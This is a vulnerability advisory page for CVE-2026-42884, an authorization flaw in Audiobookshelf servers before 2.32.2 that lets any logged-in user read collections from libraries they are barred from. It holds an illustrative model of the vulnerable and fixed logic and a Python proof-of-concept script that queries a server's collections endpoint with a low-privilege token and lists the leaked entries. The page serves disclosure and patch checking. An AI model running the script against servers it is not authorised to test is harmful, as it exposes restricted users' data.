Security Vulnerability Report
CVE-2026-42884 (CVSS 4.3 MEDIUM)

Published: 2026-05-11 20:25:45
Last Modified: 2026-05-11 20:25:45

Description

Audiobookshelf is a self-hosted audiobook and podcast server. Prior to 2.32.2, the GET /api/collections and GET /api/collections/:id endpoints return collections from all libraries without checking whether the requesting user has access to each collection's library. An authenticated user with access to any library can enumerate and read collections (including full book metadata) from libraries they are explicitly restricted from accessing. This vulnerability is fixed in 2.32.2.
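The weakness (CWE-863, incorrect authorization) is that both endpoints check only that the caller is authenticated, not that the caller may use the library a collection belongs to. The following added example is not Audiobookshelf's code: it models the pre-2.32.2 behaviour of GET /api/collections and GET /api/collections/:id next to a fixed version, using an assumed in-memory data model (the `User`, `Collection` classes, the `libraries_accessible` field and the constructed sample collections are illustration only).

```python
from dataclasses import dataclass


@dataclass
class User:
    username: str
    access_all_libraries: bool   # admin-style flag: may use every library
    libraries_accessible: set    # otherwise, the library IDs this user may use


@dataclass
class Collection:
    id: str
    library_id: str              # the library the collection belongs to
    name: str
    books: list                  # book metadata the advisory says leaks


# Constructed sample data: one public library, one the reader is restricted from.
COLLECTIONS = [
    Collection("col-1", "lib-audiobooks", "Sci-Fi", ["book-a", "book-b"]),
    Collection("col-2", "lib-private", "Family recordings", ["book-c"]),
]


def user_can_access_library(user, library_id):
    """The check the pre-2.32.2 collection endpoints never consulted."""
    return user.access_all_libraries or library_id in user.libraries_accessible


def list_collections_vulnerable(user):
    """Pre-2.32.2 shape: authentication only, every collection is returned."""
    return list(COLLECTIONS)


def list_collections_fixed(user):
    """Fixed shape: keep only collections from libraries the caller may access."""
    return [c for c in COLLECTIONS if user_can_access_library(user, c.library_id)]


def get_collection_vulnerable(user, collection_id):
    """Pre-2.32.2 shape for /api/collections/:id: lookup by id, no library check."""
    for c in COLLECTIONS:
        if c.id == collection_id:
            return 200, c
    return 404, None


def get_collection_fixed(user, collection_id):
    """Fixed shape: an inaccessible collection is indistinguishable from a
    missing one (404), so restricted users cannot enumerate ids either."""
    for c in COLLECTIONS:
        if c.id == collection_id:
            if not user_can_access_library(user, c.library_id):
                return 404, None
            return 200, c
    return 404, None


if __name__ == "__main__":
    reader = User("reader", False, {"lib-audiobooks"})
    print("vulnerable:", [c.name for c in list_collections_vulnerable(reader)])
    print("fixed:     ", [c.name for c in list_collections_fixed(reader)])
    print("fixed by id:", get_collection_fixed(reader, "col-2")[0])
```

Returning 404 rather than 403 for a collection in a restricted library is a design choice made here, not something the advisory states about the 2.32.2 fix; it keeps the by-id endpoint from confirming that a collection exists.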

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available yet (NVD status: Received).

Affected: Audiobookshelf < 2.32.2 (fixed in 2.32.2)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that a 200 response from /api/collections by itself proves nothing: the endpoint answers 200 for any authenticated user on patched and unpatched servers alike. The server is vulnerable only if the response contains collections from libraries the token's account is restricted from, so the check below compares each returned collection's libraryId against the libraries that account is allowed to access.

```python
import requests


def check(target_url, token, allowed_library_ids):
    """
    Proof of concept for CVE-2026-42884.

    Calls GET /api/collections with a low-privilege token and reports every
    collection whose libraryId lies outside the libraries that account may
    access. Returns the list of leaked collections (empty if none).
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "User-Agent": "CVE-2026-42884-Scanner",
    }
    # Endpoint that, before 2.32.2, returns collections from all libraries
    # without checking the caller's library access.
    endpoint = f"{target_url.rstrip('/')}/api/collections"
    try:
        response = requests.get(endpoint, headers=headers, timeout=10)
    except requests.RequestException as e:
        print(f"[!] Error: {e}")
        return None

    if response.status_code != 200:
        print(f"[-] Request failed with status code: {response.status_code}")
        return None

    data = response.json()
    # Tolerate both a wrapped {"collections": [...]} object and a bare list.
    collections = data.get("collections", []) if isinstance(data, dict) else data

    leaked = [
        c for c in collections
        if c.get("libraryId") is not None
        and c.get("libraryId") not in allowed_library_ids
    ]
    if leaked:
        print("[+] Vulnerability confirmed: collections from restricted libraries returned")
        for c in leaked:
            print(f"    id={c.get('id')} libraryId={c.get('libraryId')} name={c.get('name')!r}")
    else:
        print("[-] Only collections from permitted libraries were returned (likely patched)")
    return leaked


if __name__ == "__main__":
    # Replace with the actual target, a valid low-privilege token, and the IDs
    # of the libraries that token's account is permitted to access.
    target = "http://localhost:80"
    user_token = "VALID_LOW_PRIVILEGE_TOKEN"
    allowed = {"LIBRARY_ID_THE_USER_MAY_ACCESS"}
    check(target, user_token, allowed)
```

References

GitHub Security Advisory GHSA-rxw2-h55w-ffmh (CWE-863): https://github.com/advplyr/audiobookshelf/security/advisories/GHSA-rxw2-h55w-ffmh

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-42884",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-11T20:25:44.740",
    "lastModified": "2026-05-11T20:25:44.740",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Audiobookshelf is a self-hosted audiobook and podcast server. Prior to 2.32.2, the GET /api/collections and GET /api/collections/:id endpoints return collections from all libraries without checking whether the requesting user has access to each collection's library. An authenticated user with access to any library can enumerate and read collections (including full book metadata) from libraries they are explicitly restricted from accessing. This vulnerability is fixed in 2.32.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-863" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/advplyr/audiobookshelf/security/advisories/GHSA-rxw2-h55w-ffmh",
        "source": "[email protected]"
      }
    ]
  }
}
```